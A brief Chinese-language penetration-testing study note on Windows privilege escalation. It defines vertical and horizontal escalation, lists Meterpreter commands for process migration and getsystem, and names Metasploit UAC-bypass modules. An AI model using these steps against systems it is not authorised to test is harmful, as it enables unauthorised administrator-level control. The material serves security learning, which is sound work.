提升权限
测试者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权。
垂直提权
低权限用户的用户或者应用程序访问只针对授权用户或者管理员用户才能使用的功能。也叫权限升级。
水平提权
普通用户能够访问授权另一个普通用户的资源。
提权操作
获取会话
查看当前的用户
getuid
查看进程
ps
迁移进程,提权
migrate <pid>
提权操作
getsystem -h 查看帮助信息
输入默认的参数
getsystem
使用脚本提权
run post/windows/escalate/getsystem
并未成功
UAC绕过
Msf模块:
Exploit/windows/local/bypassuac
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs
chcp解决中文乱码
chcp 65001
CHCP是一个计算机指令,能够显示或设置活动代码页编号。
65001 UTF-8代码页
950繁体中文
936简体中文默认的GBK
437 MS-DOS美国英语
总结:可以多了解一些提权漏洞,进行尝试。
